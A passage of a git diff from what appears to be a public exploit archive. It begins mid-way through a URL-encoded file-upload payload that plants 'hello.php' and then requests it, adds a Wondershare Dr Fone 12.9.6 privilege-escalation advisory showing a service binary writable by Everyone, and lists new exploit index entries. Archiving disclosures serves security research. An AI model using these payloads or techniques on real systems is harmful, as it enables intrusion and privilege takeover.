bO9ZlZ8sdjYnoDrcIqOmIS%2FF9na2wB81r3jK8NFxFp3B0KhVfJndGMa4JJ30wFbs%2FXE9wqqh2crvdlyGSJE9F6EcWGgjddxGJjK5pgxrsqJknBGOZ2HqhhLjDpAA%2BcrlLsqxpPxX2GwTrGceeJB1Wfo4t9V8CSSYHqklNlIYl9HGHFMRTpUxOgMSfFbfs72ciKlW51A%2B6H7K9nxT77oc%2F5dAtc2dlFS9F2lHgSx0aQqsc4ZC7yI%2FPy6Ar1BeLHzS%2BrxJ4BaTM9U%2F8AIoqmCOFt2gPG4oMFWsb%2FAAmy3q42bPnHovPf%2Bt4n%2FuuWi7b4rJTpUQYL%2FwCZU8JhgPuVjYRxxpEf8ifqf9DVhVzSh2K1pShCWFGYJsuA5lAsRuHOVwifwLvoxXTpZy8uJysFiTvoB8lj%2BMVxnMGwWp4szLRYN3Brj5idPArHYtsPE3Gn2VYr4P6%2Bjbs%2FwxtbvPIa3rv4D6rWMxNGk0MpjSLC2m7haVluH4ZzZOWzhEGQJEEB0XjWyfMqOs0tjLAd3ctzoZ0ynQEclZaM0nbLzWLgY535np4IOuCDOm33Tvh2EDiJ7rh%2Btuo6OHQ3XOJcPgdPlp9VLJwbHLZRWr5zTI5RPgNlB7h8R7TItIPKRKpwlKInY36QHTPomGMDXUnP2gt87%2FQhSjKiskAurTGYXiD%2BeqXY6o6iCDdp9p0PoQp06hhoPJve%2BR%2Bc9Aqs09xxmC5hB%2Ftgwm9C0KsnxJMnaPBc7JvLcSwRuZ80x4ZhmuDmaFs%2BcbfNNMHwkBwezUjRSnLVFILZvsA0QIPzRxa78ulfB2d2%2FJGGoWAmDHqhi4Ge2DcQxDmiImdOfql%2FD8Nmcc2ky48gLm6YDHseQMw1u0iEk%2F1AxJosLKboDyAYtaJKMoqT%2FwCD%2B3jg9bMNx7HGtXqP2LiG9GizQPJLoUiFyFc84ZtVjVUCptUzQE0dUZkJe07BB4YSUfmRSs6xZ2jxUv8AID2Snh%2BDNV8TA8BcHWAdUXxDCPqP%2Bf7lMcDhPhiD5J72df40MMLhW5cpAkWI52gEctijsPYlp7wI7s8jEtPT88A6T9Drt7osFG7J0X0AAQRb80K5iq8gjxHqNl83QIV93X5%2BxsfeChJ6pjRX0WYqq5shsmYA6g5QYHt6q11eKFSmYBDh7getw72VtOO5a9p6ET%2F%2BVXWw4NzoSHR07zr%2BsJFEpYFw2kXYeSNHFt%2BQdb3EeapxlGHtcLjfmRpJ8reStocRyVfhx3bevdd6zKKxjJLdg5pHnAc0%2B8IPQVsAxWHdSxIqCcj4vyJABB8fqthgoLmiJEfMD7FLa9djKbA%2B%2BYWnmIP2THAPhwgzYX6H%2Fg%2BqlPY8TS4BgIBj82RteiHiNuiowzIty%2B10a1yC0hW9ifFcMZT73t91lP8AU%2BoIoN%2FqcC4%2BwC2%2BIMvaOsn7LzDt%2FXc%2FFunQABvQDknx9FytuOzNLikuK5lGIVjQoBWNKmaA7h9GTPJEuYQvsGMrR1XcQ9E4pdIQ76hJ%2FPmu1H9ZVbKU8vzkdkAltOqR9fumuCOa2qW0KAP0kX9d05wbYCZAZe0QIQVZ0GdPzRFvJOirfh51XM5I%2BwNBrjprBBG17%2FMoTizfhSIs6b9M7XT7lEYQPpOtBHK3nBV%2Fal7X0Wm1nRP%2B5swfzZcn%2BJzX5IUcR4WKlJ1Zgu2XjqWy75W9EMaxNKm8%2FwBAg9CCNfULQ9kW56UO3%2BRMGfRKuM4AsFfZs%2FEbyyklnyLUJbVhi90U8c71TDU9QWyPIAfJo9Vp8LhhTLfAfQfRZPgwdUrYcn%2BhnvafcStpxxuSmx4mxA8Z%2FwCR6JWtDXuh1h%2F0g87%2FAGRLXSEPg%2B%2FRkakeiswtPKLlJKL%2BHJkKreaw3%2BouAPcqgCNC
d1vHtk6FKu1WCz4WoInKJHklhakdPcTx5fLpXFqMg8%2FhlKnRuE2NBVmnCUqiis8NCHrVSfz2Usc09UtfiHN6hcOE1JOinh6bvuVU3GsIuYI5i6ErY92bue6NIGzQ4Yhv5KPbWA3CyNKvWcYhN8Lw9x1cUrGSHT8fSZ%2Bp%2BX83Vdfi1Bl8r3E7kEeFiRHqhW020qlJ7mh4ZUu0%2FwBXddYyOcJFx%2BsRSqO1cAcvibSEXukmdajbaHv%2FAMloudDpadJiI%2Bf2XeNvNSmWNIMnNaYBymSPH6pLjeGNfh3VDYtygbXIM%2FIJd2X4o8PFN5JABif7QYA%2BaXy2hlOJt%2BzLXNbF7WPOdIHXXy8UZ2ieH06otGXJ5Dl5%2FJLaeIygHwP7np08FKpWmmZN5%2FYT5R6ITTSo6FN2JOzlU52nkI00IsfZekcTp%2FEoOtNrdSPxywXZzAuJcRp6zAXpLyKNJpcL2DRzPKErl0PnaYPwkFmHaCIJvHIbSiMPXboXjwkD2WW41xCpLJJDTUY2GyP1FMuJ06VFrKgAD2lgJ3cHnK4HncyPBNCMpKxJTgpV9NFlnr6pJ22xPwsK8yQXDKI6pkys9sQJEXMLJ%2F6p4r%2BXTaP6jJ8gjFbFk3R5qSuL5cVCB6GWKjEU0UFViSIU7NFC2sbGUlc9odGx629wn8SlHEsFFwmujkidPANqiY0RdDhrabbjXmgOH4ks1kjxTl%2BNYRsTvJsCntC00L8Y3Ldo8VfwrHgWIA8QVCpUDiIcAdov5IXFU4u4R129UskNF%2FB7jqAqMJaYNvCQbRsstXrtnLVEGbg6Eg2g%2BSYYbEuaCWvA5zp6KOMqtqznYPEW9Cp2U82KOPdqAafwqelpaLy6ILiefRK%2BBUnPc1%2Bwt7%2FuiMfw5oMga9VdgKnw2kbk%2FVXh5rRGSdmxcO59EPVqQ2Jv%2B1lfTdmY2%2ByoqMlw%2FwBwHvF%2FVDLw7D003Y%2FC38b%2B8pp2p4m1mIpMeQGw6JtJso9mGBoAkTb2S%2FttgW4lxBaHZdDu3S4KhSrZbstEcbUohzTUcA1rg%2FSZLdAs7j%2BOfxuIbSpAhucF5mRDTLWjzufAJJiuEhrodUdG0l59pWj4F8KiIo0yXf3ER6IuajGrBHF%2BVnoeEqWvy%2BQXmvb%2BoXVYvDRZbnhLXuEuEDX8KwXaum19V2U94f0nXy5roNy2JkSjoyJXy7UEG6iqmdm%2BOIsg6teUsoYrNurwSNUtFxhhWyr69C0FA4GtBTSmZ3QCIshabiyn%2FwBKbUBLbHknNXDg2P55qgUiwjK0HrAXa%2Bj7fBGzhmR2pBHNMalF20TyIsU4o0w8S8eBghTfw0HT13VFC%2BEpTrplK1BzdW%2B0geaGq1cojbY6eX%2FK1fEuEtiRr4rN43BfDEkAnly%2B6nLHJMpDLFoUYhzrDblM%2BaGyknfX66lM6PDnv70fuunBx49E6VCt2w3C1YZAPmmGFINjrt4i8pPSadDa6OwtM6ei6QYm14XLWg7qyu4io5w%2FqbInnyQfCHFxDfD8%2BSauwjnCwUZ9RSP0wFSm6pVOaxm%2B0eHVang%2FDTtpyn8lEN4J3jAvvoneDwIbEgSOUqLTkyvpJFePr%2FBoujYaryPidfM8md16F264gGMyc15fXqSVpiZJs6a4dZ%2Fk7fz5qPwf8h6qhfKlkKGXDaZiUZ8UjRWYamAwQoVKKmzSi7C1ATJt1H2TfDVpsNOv3SLDsM2Gm50CZ03gbyUQDoNkXI9VV8CqD08QLeahQNiZjwt76oqizNE6bn9yj5TO9NEsO2%2F6gOYufoneDa076pc7DgHXyGvmrMO%2FIYA99PS6eE%2FDEnD2i%2FiWG7pWYxXDabhd5BJ3%2BQlbppD2%2FSPukHFsI4WcyRzkg%2Bg1VslPaI47TpmPr4dzM2UhzRo2fC
0LlAjuh4yudoLz6lNMRgACSx5Y4i%2BaR4QFfhsHVEEhj7ad2T6eCgumhrQrrYbK5rnjubuFi0%2F5Dl1RNMtL%2B5BHiD8lpv4MOblLRJ1vYTsk2H4O3CudAEPIItqTIDfdLm0tFf8AHpvYz4G0ioDl3WwxTAxo1naNboPs9gAA17rnl15pxjGOcRAA%2FwAje3glxxl4uXRc04udR4AsoODC6Lu238lEHKLj1RGNrBoA1jUyR5SLDzQb8Q46OPg4AjyK5pIVNsyfbzCFzM4JtyK8xqF3Mnx%2By9n7SMaaLg9pFtW39ivI8bw17Zcwioz%2B5u3%2B5uoTRuicwAv8PQKMrhXyYQ01CS0fJfPbHX5eu67g7Nj3O6JaxsXueSSi9i7MSYnwA%2BgCNw7I1t81XWa7%2Bnujpb1OpUcOQ3aT6D7n2XI5jQPAFvMxMesAJhwwtIzEl52E2CQ4hznw39gOvII%2Fh%2BLFOwvtO3kmToDVmhY4umwHlr66rhbDe873t4QNUFWxQYwvefAX8kLwh1Su%2FM6Q1tmjSSflCbTArQ9wpJuCbXnT0G3mranFmhzabpJPLbzXKzxTZA13PU6BZ3D1C7EPB1AbpsBf1v6eJU3Ly9DqPpbNZU4c0iRBB5j6hDN4fTBGgjaYAR1fE%2FDp5heIt05DqrcOGYhoc0CTqFVeX%2FZJuS%2FoEaWC5cD0aCpvomqWkAw3SfqjmcMDdtdUVUeykOsbJXFjKa%2BFmApwLnRdxWPa02hx2k2H2WM4n2myOLXtI5EeyqPFQ6C07D0%2FSVOWVRVDxwuWzQOqPkmd7h0kCeY1b4gkdAradGbjuncatd1EWKXYOu53Uj3CbsMAcjtyPQqSkpdHlFxBOMUyabhOUxvcH1XkWJxfw3uBpw4G%2BUlvnuvZsdem7wO30%2Bi8c4%2FTBcTo4HyLToQdwrwf6ITX7BKmIo1P1Nc0%2FwBwA9wPoq%2F4aj%2F3x%2F6O%2ByCXE9kqNSTYRb5r5rjsiH0e4DOyXvnqpvTNC2hi0tdqZKhXwp12UcM8MufRdxOKLrgfZMKU%2FEkQPT7lfNxTaQzEgu2b9Y%2BSFpYeo8kzlaNY3jZSwlFgqZn338Tt5Lq%2FYb%2FQZh6hd%2FMrWAuxvXnC0fB8U1jLfqJ9AVnq1I1CMo7uwO%2F7JhkcBDbaT5LnaOVM0GFpmo8Oce6BJHhuVn%2BFVM%2BIq1m6fEjxGnoiqLXii7XM%2BRPJql2bwAYXsNpAI8VOrKcH2IIdmaOX0Q%2FB3mnOsX8uYQ2CDnB97h0Ejlsu1GFrgA4kjprshK07DFJqhk3ipa8yTlIge6W4jjJzFoMkGZ6bITEZgTmaYkacuiV4vA5jmbII0I36FSlllwrHFHoxfiBUOctnaPoQjsNw4G4bH%2FIKA4CGkwT3hYg6rStw5iWuIjbZSVyY8pKPC7D4ctEgeSm3EnNlcIG30K%2BoV8wg2PNcxBtBE9Vakloz3b2EEyCF5J2kohlZzDZpJj%2FB28f4nXzXrGHYSJ6XXm%2FbMMfUcBZzfcbHyNvNWxPRLKjH1GEGCoK1zpEHUaHpyVSoRNzw8B1JqA4jSOylwXEHImfww7qg1ZROmZumS39RsoDiJc8Nju8k%2FwATwjNokGJwppOkFLtdKafBnWxOW1sqFo0%2FjElkgDfmgHV7QSi6WOyNAbpuB9U%2BmTpoZYaoaegvpJ08U5wpaRJMmBMb%2BCS0sYxwg26dUbhsGcvdMCPNH1RyVmgwVQFnegE6DkJSXtTxQ0nNLLEub6C%2Fup4J7py72AJ6an5JZ2poZi0cgozybVF4Y9Mf9jcdnzTGbWOY5p1XhzszQPDY%2FZeacCxxpugzykajqtieKGmATDmO%2FrGx%2FwAgmjNNeWLKDTtDTG1csOjo5p2QwImYgHUIKvxHMIInkdiPFcqvygGfIqOSrKwToK4hw5tqtMnNFwN1
3C401GQHd4DwnoUNS4uGyLR%2BaJdjy4VWvpWB1CRtJWOot6G2Fxb2kgG41a76FNsE51TaOiRYSi97w5y13CsNCRNzdI6dRV%2FQ2jShhleS9qaJbXNQXEmeo3C9gxr4YV55x%2FB5gTC1N%2BaRlUfabPOcRTg201HgqkTjaRa4hDKhB6NbwdkUpTKhUgX33S3g7D8FW1A5cyo5OJAGhJOiUcSwbnXi6JbV2BiEQ089Pn4o9Bww2LwbmnzUqNNzW2uNytXicCKh5jc%2FRUPwEDQxyCXyP6X0yzQ4u1IG%2FXoFpOGcShuUiwi8%2Bv50VQ4Xm0EHdWUsDl7safk%2BKnKTXSsEmOeFYhtR9RznABoEeElBV3tr1jl%2FSLDx5pXXpEERa8ny0C7wbE%2FALXu0c6I%2BqlakW8%2BdlFekKeIIOhhOMe2sGfyntcP6mkd4DmOaFx5biHlzdQdemyJp4R1rd4W%2Fdc3TBVoqw2LqNYJaHTrFh6bFcw9cum5N9Dt0T%2FAYMx3hr0R%2BC4VTzERce6RtvgycUIcPwn4rTcghOOE8NNgdk6p4UMcLI1lEA5hodQh%2FG30V5f0fYbAgBFUSGmykyoEO0HMrpKPDNbl0vxwlhKQYmkHNiFpK7RkISEFdkDjPOO0nDoJIWb%2BEvUeO4IOaVjP%2BndE0J6BkhbsM4Q4%2FCBRcZkPgYFNoHJdbWiVVk0QqHKbXRGGql5gk%2BH3XzL3t4KLxl0uV3A9CXUHD%2Bq2yvpVIF7nQKNCubDL5fcqz4ZJEmDrbZdZ1BdHDEeJ%2FCVVSpAuI%2FCpF%2BUanxOpVrW5QTPJTkUihdxjDMYDz2WS4hXtTZGhK2GOpBzc7jqQADzOgWX4zQBrBjb5bHxWZaZq6hr2cwsSTpBlPeH1W1HcxzHPaVLgNMCjmIuAZHh%2ByE7O04cS3TMbdJRbB2zUUgGiNRt0U8xnTz381RnJMGxGhUatYwDNzZH0T8hWcz3tET8WR4IDDvdbNed0Y4aQipCtHZMgjcI3DHUEXQtSsGiPwKbcQDeU619Eew1wOUrO1nQ4haGk%2ByQ8RZ%2FMQy8sOPtA%2BJbmakv8AAp9Ch8FSTKtGG4Y6WAK80Qd7oXhmiYYZb6tGO6ADTc11zZGYWo0mSVbi2iEmqmNEnCi2M8RijTPcV1HHgkE25%2Fug8Fc3V2LaINtkr0OthWJxIqOpie6XCY36JpiCBfzWX4UP5g8QtBjj3h%2Ft%2Bqm%2BD1TE%2FaCq92Qgw1rp89JVlPh2Qhx3E%2BpRPHgPhf8Ak36JjxQfyR5KL4WT4FYWGsyxflzlC8KDQSWm8mW76q2kf%2Fr%2FANo%2BaTOMYq1vBDWgJXZo3uLiYEGFPD0QBJMrlU2KroG351Rq3sHzQxztjNcRrK7U4nTy2MoSibFBUB3kVKhPF9GP8UXX12V2Ao%2F8LmEAlGkLl%2BW2c9aQWxtkh4i8iotC39Kz%2FFP1hPl%2F1FxdLmXC%2Bhdo6K2FNIZn%2F9k%3D&filename=hello.php + +#we visit the image + +http://localhost/uploads/users/tmp/hello.php \ No newline at end of file diff --git a/exploits/windows/local/51324.txt b/exploits/windows/local/51324.txt new file mode 100644 index 000000000..211da02f4 --- /dev/null +++ b/exploits/windows/local/51324.txt 
@@ -0,0 +1,51 @@
+# Exploit Title: Wondershare Dr Fone 12.9.6 - Privilege Escalation
+# Date: 14 March 2023
+# Exploit Author: Thurein Soe
+# Vendor Homepage: https://drfone.wondershare.com
+# Software Link: https://mega.nz/file/ZFd1TZIR#e2WfCX_ryaH08C3VNGZH1yAIG6DU01p-M_rDooq529I
+# Version: Dr Fone version 12.9.6
+# Tested on: Window 10 (10.0.19045.2604)
+# CVE : CVE-2023-27010
+
+
+
+*Vulnerability description*:
+
+Wondershare Dr Fone version 12.9.6 running services named "WsDrvInst" on
+Windows have weak service permissions and are susceptible to local
+privilege escalation vulnerability. Weak service permissions run with
+system user permission, allowing a standard user/domain user to elevate to
+administrator privilege upon successfully modifying the service or
+replacing the affected executable. DriverInstall.exe gave modification
+permission to any authenticated users in the windows operating system,
+allowing standard users to modify the service and leading to Privilege
+Escalation.
+
+
+C:\Users\NyaMeeEain\Desktop>cacls "C:\Program Files
+(x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe"
+C:\Program Files (x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe
+
+Everyone:(ID)F
+
+NT AUTHORITY\SYSTEM:(ID)F
+
+BUILTIN\Administrators:(ID)F
+
+BUILTIN\Users:(ID)R
+
+APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
+
+APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
+C:\Users\NyaMeeEain\Desktop>sc qc WsDrvInst
+SERVICE_NAME: WsDrvInst
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 3 DEMAND_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : "C:\Program Files
+(x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe"
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Wondershare Driver Install Service
+ DEPENDENCIES : RPCSS
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f39d7631a..f031eb470 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -1583,6 +1583,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 16962,exploits/asp/webapps/16962.txt,"SmarterStats 6.0 - Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",webapps,asp,,2011-03-11,2011-03-11,1,,,,,,
 34614,exploits/asp/webapps/34614.txt,"SmarterTools SmarterStats 5.3.3819 - 'frmHelp.aspx' Cross-Site Scripting",2010-09-09,"David Hoyt",webapps,asp,,2010-09-09,2014-09-11,1,,,,,,https://www.securityfocus.com/bid/43110/info
 26439,exploits/asp/webapps/26439.txt,"Snitz Forum 2000 - 'post.asp' Cross-Site Scripting",2005-10-31,h4xorcrew,webapps,asp,,2005-10-31,2013-06-25,1,CVE-2005-3411;OSVDB-20421,,,,,https://www.securityfocus.com/bid/15241/info
+51323,exploits/asp/webapps/51323.txt,"Snitz Forum v1.0 - Blind SQL Injection",2023-04-07,"Emiliano Febbi",webapps,asp,,2023-04-07,2023-04-07,0,,,,,,
 4687,exploits/asp/webapps/4687.html,"Snitz Forums 2000 - 'Active.asp' SQL Injection",2007-12-03,BugReport.IR,webapps,asp,,2007-12-02,,1,OSVDB-39002;CVE-2007-6240,,,,,
 24604,exploits/asp/webapps/24604.txt,"Snitz Forums 2000 - 'down.asp' HTTP Response Splitting",2004-09-16,"Maestro De-Seguridad",webapps,asp,,2004-09-16,2013-03-06,1,CVE-2004-1687;OSVDB-10070,,,,,https://www.securityfocus.com/bid/11201/info
 28566,exploits/asp/webapps/28566.txt,"Snitz Forums 2000 - 'forum.asp' Cross-Site Scripting",2006-09-13,ajann,webapps,asp,,2006-09-13,2013-09-27,1,CVE-2006-4796;OSVDB-28832,,,,,https://www.securityfocus.com/bid/20004/info
@@ -3584,6 +3585,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38356,exploits/hardware/remote/38356.txt,"Foscam < 11.37.2.49 - Directory Traversal",2013-03-01,"Frederic Basse",remote,hardware,,2013-03-01,2015-09-30,1,CVE-2013-2560;OSVDB-90821,,,,,https://www.securityfocus.com/bid/58290/info
 38437,exploits/hardware/remote/38437.txt,"Foscam IP (Multiple Cameras) - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-09,shekyan,remote,hardware,,2013-04-09,2015-10-10,1,,,,,,https://www.securityfocus.com/bid/58943/info
 39195,exploits/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",remote,hardware,,2014-05-08,2016-01-08,1,CVE-2014-1849;OSVDB-106777,,,,,https://www.securityfocus.com/bid/67510/info
+51321,exploits/hardware/remote/51321.txt,"Franklin Fueling Systems TS-550 - Exploit and Default Password",2023-04-07,"Parsa Rezaie Khiabanloo",remote,hardware,,2023-04-07,2023-04-07,0,,,,,,
 49293,exploits/hardware/remote/49293.txt,"FRITZ!Box 7.20 - DNS Rebinding Protection Bypass",2020-12-18,"RedTeam Pentesting GmbH",remote,hardware,,2020-12-18,2020-12-18,0,CVE-2020-26887,,,,,
 32753,exploits/hardware/remote/32753.rb,"Fritz!Box Webcm - Command Injection (Metasploit)",2014-04-08,Metasploit,remote,hardware,,2014-04-08,2014-04-08,1,OSVDB-103289,"Metasploit Framework (MSF)",,,,
 4744,exploits/hardware/remote/4744.txt,"FS4104-AW VDSL Device (Rooter) - GoAhead WebServer Disclosure",2007-12-18,NeoCoderz,remote,hardware,,2007-12-17,2018-01-25,1,OSVDB-43168;CVE-2007-6702,,,,,
@@ -3893,6 +3895,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware,,2018-03-06,2018-03-06,0,CVE-2018-5767,,,http://www.exploit-db.com/screenshots/idlt44500/rootshell.png,,https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/
 49782,exploits/hardware/remote/49782.py,"Tenda D151 & D301 - Configuration Download (Unauthenticated)",2021-04-21,BenChaliah,remote,hardware,,2021-04-21,2021-04-21,0,,,,,,
 50916,exploits/hardware/remote/50916.txt,"Tenda HG6 v3.3.0 - Remote Command Injection",2022-05-11,LiquidWorm,remote,hardware,,2022-05-11,2022-05-11,0,,,,,,
+51317,exploits/hardware/remote/51317.py,"Tenda N300 F3 12.01.01.48 - Malformed HTTP Request Header Processing",2023-04-07,@h454nsec,remote,hardware,,2023-04-07,2023-04-07,0,CVE-2020-35391,,,,,
 5150,exploits/hardware/remote/5150.txt,"Thecus N5200Pro NAS Server Control Panel - Remote File Inclusion",2008-02-18,Crackers_Child,remote,hardware,,2008-02-17,,1,OSVDB-42179;CVE-2008-0804,,,,,
 38242,exploits/hardware/remote/38242.txt,"Thomson CableHome Gateway (DWG849) Cable Modem Gateway - Information Exposure",2015-09-19,"Matthew Dunlap",remote,hardware,,2015-09-20,2015-09-20,0,OSVDB-127948;OSVDB-127871,,,,,
 38850,exploits/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics - Remote Code Injection",2013-11-22,"Eduardo Gonzalez",remote,hardware,,2013-11-22,2015-12-02,1,CVE-2013-5912;OSVDB-100273,,,,,https://www.securityfocus.com/bid/63880/info
@@ -4491,6 +4494,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17116,exploits/hardware/webapps/17116.txt,"Longshine Multiple Print Servers - Cross-Site Scripting",2011-04-04,b0telh0,webapps,hardware,,2011-04-04,2011-04-04,0,,,,,,
 44488,exploits/hardware/webapps/44488.py,"Lutron Quantum 2.0 - 3.2.243 - Information Disclosure",2018-04-18,SadFud,webapps,hardware,,2018-04-18,2018-04-18,0,CVE-2018-8880,,,,,
 45351,exploits/hardware/webapps/45351.py,"LW-N605R 12.20.2.1486 - Remote Code Execution",2018-09-10,"Nassim Asrir",webapps,hardware,,2018-09-10,2018-09-10,0,,,,,,
+51315,exploits/hardware/webapps/51315.txt,"MAC 1200R - Directory Traversal",2023-04-07,"Chunlei Shang_ Jiangsu Public Information Co._ Ltd.",webapps,hardware,,2023-04-07,2023-04-07,0,CVE-2021-27825,,,,,
 49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,,2020-12-14,2020-12-14,0,,,,,,
 35933,exploits/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting",2015-01-29,"Ertebat Gostar Co",webapps,hardware,,2015-01-29,2015-01-29,0,CVE-2012-4891;CVE-2012-4889;OSVDB-80874;OSVDB-117694;OSVDB-117566,,,,,
 25813,exploits/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",webapps,hardware,,2013-05-29,2013-05-29,1,CVE-2013-1605;CVE-2013-1604;OSVDB-93709;OSVDB-93708,,,,,http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities
@@ -10685,6 +10689,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 28987,exploits/multiple/remote/28987.c,"Digipass Go3 - Insecure Encryption",2006-11-13,faypou,remote,multiple,,2006-11-13,2013-10-16,1,,,,,,https://www.securityfocus.com/bid/21040/info
 31890,exploits/multiple/remote/31890.txt,"Diigo Toolbar and Diigolet Comment Feature - HTML Injection / Information Disclosure",2008-06-20,"Ferruh Mavituna",remote,multiple,,2008-06-20,2014-02-25,1,CVE-2008-7184;OSVDB-57877,,,,,https://www.securityfocus.com/bid/29611/info
 9915,exploits/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit)",2002-02-01,"H D Moore",remote,multiple,3632,2002-01-31,2017-04-01,1,CVE-2004-2687;OSVDB-13378,"Metasploit Framework (MSF)",,,,
+51314,exploits/multiple/remote/51314.py,"Docker based datastores for IBM Instana 241-2 243-0 - No Authentication",2023-04-07,"Shahid Parvez (zippon)",remote,multiple,,2023-04-07,2023-04-07,0,CVE-2023-27290,,,,,
 34297,exploits/multiple/remote/34297.txt,"dotDefender - Cross-Site Scripting Security Bypass",2010-07-09,SH4V,remote,multiple,,2010-07-09,2014-08-09,1,,,,,,https://www.securityfocus.com/bid/41560/info
 5257,exploits/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 < 1.1rc2 - Remote Email Disclosure",2008-03-14,kingcope,remote,multiple,,2008-03-13,,1,CVE-2008-1218,,,,,
 30643,exploits/multiple/remote/30643.txt,"DropTeam 1.3.3 - Multiple Remote Vulnerabilities",2007-10-05,"Luigi Auriemma",remote,multiple,,2007-10-05,2014-01-03,1,CVE-2007-5264;OSVDB-41642,,,,,https://www.securityfocus.com/bid/25943/info
@@ -10810,6 +10815,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 26966,exploits/multiple/remote/26966.txt,"httprint 202.0 - HTTP Response Server Field Arbitrary Script Injection",2005-12-22,"Mariano Nunez Di Croce",remote,multiple,,2005-12-22,2013-07-21,1,CVE-2005-4502;OSVDB-21916,,,,,https://www.securityfocus.com/bid/16031/info
 19466,exploits/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 - Information Disclosure",1999-08-18,"Gregory Duchemin",remote,multiple,,1999-08-18,2017-11-15,1,CVE-1999-0753;OSVDB-1049,,,,,https://www.securityfocus.com/bid/591/info
 19459,exploits/multiple/remote/19459.txt,"Hybrid Ircd 5.0.3 p7 - Remote Buffer Overflow",1999-08-13,"jduck & stranjer",remote,multiple,,1999-08-13,2012-06-30,1,CVE-1999-0679;OSVDB-1043,,,,,https://www.securityfocus.com/bid/581/info
+51316,exploits/multiple/remote/51316.py,"IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE)",2023-04-07,"Maurice Lambert",remote,multiple,,2023-04-07,2023-04-07,0,CVE-2022-47986,,,,,
 38825,exploits/multiple/remote/38825.xml,"IBM Cognos Business Intelligence - XML External Entity Information Disclosure",2013-10-11,IBM,remote,multiple,,2013-10-11,2015-11-30,1,CVE-2013-4034;OSVDB-99742,,,,,https://www.securityfocus.com/bid/63719/info
 35918,exploits/multiple/remote/35918.c,"IBM DB2 - 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution",2011-06-30,"Tim Brown",remote,multiple,,2011-06-30,2015-01-27,1,,,,,,https://www.securityfocus.com/bid/48514/info
 20472,exploits/multiple/remote/20472.txt,"IBM DB2 - Universal Database for Linux 6.1/Windows NT 6.1 Known Default Password",2000-12-05,benjurry,remote,multiple,,2000-12-05,2012-08-13,1,CVE-2001-0051;OSVDB-9484,,,,,https://www.securityfocus.com/bid/2068/info
@@ -15447,6 +15453,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50306,exploits/php/webapps/50306.py,"Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-09-20,"Abdullah Khawaja",webapps,php,,2021-09-20,2021-09-20,0,,,,,,
 50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",2021-07-09,"Eleonora Guardini",webapps,php,,2021-07-09,2021-07-09,0,,,,,,
 50965,exploits/php/webapps/50965.txt,"ChurchCRM 4.4.5 - SQLi",2022-06-14,nu11secur1ty,webapps,php,,2022-06-14,2022-06-14,0,CVE-2022-31325,,,,,
+51319,exploits/php/webapps/51319.py,"ChurchCRM 4.5.1 - Authenticated SQL Injection",2023-04-07,Arvandy,webapps,php,,2023-04-07,2023-04-07,0,CVE-2023-24787,,,,,
 51296,exploits/php/webapps/51296.txt,"ChurchCRM v4.5.3-121fcc1 - SQL Injection",2023-04-06,nu11secur1ty,webapps,php,,2023-04-06,2023-04-06,0,,,,,,
 15887,exploits/php/webapps/15887.txt,"ChurchInfo 1.2.12 - SQL Injection",2011-01-01,dun,webapps,php,,2011-01-01,2011-01-01,1,OSVDB-70253,,,,http://www.exploit-db.comchurchinfo-1.2.12.zip,
 36874,exploits/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",webapps,php,,2012-02-22,2015-05-01,1,CVE-2012-1001;OSVDB-79456,,,,,https://www.securityfocus.com/bid/52115/info
@@ -24257,6 +24264,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 8504,exploits/php/webapps/8504.txt,"NotFTP 1.3.1 - 'newlang' Local File Inclusion",2009-04-21,Kacper,webapps,php,,2009-04-20,,1,OSVDB-54124;CVE-2009-1407,,,,,
 17296,exploits/php/webapps/17296.txt,"NoticeBoardPro 1.0 - Multiple Vulnerabilities",2011-05-16,"AutoSec Tools",webapps,php,,2011-05-16,2011-05-21,1,OSVDB-72366;OSVDB-72365,,,,http://www.exploit-db.comNoticeBoardPro.zip,
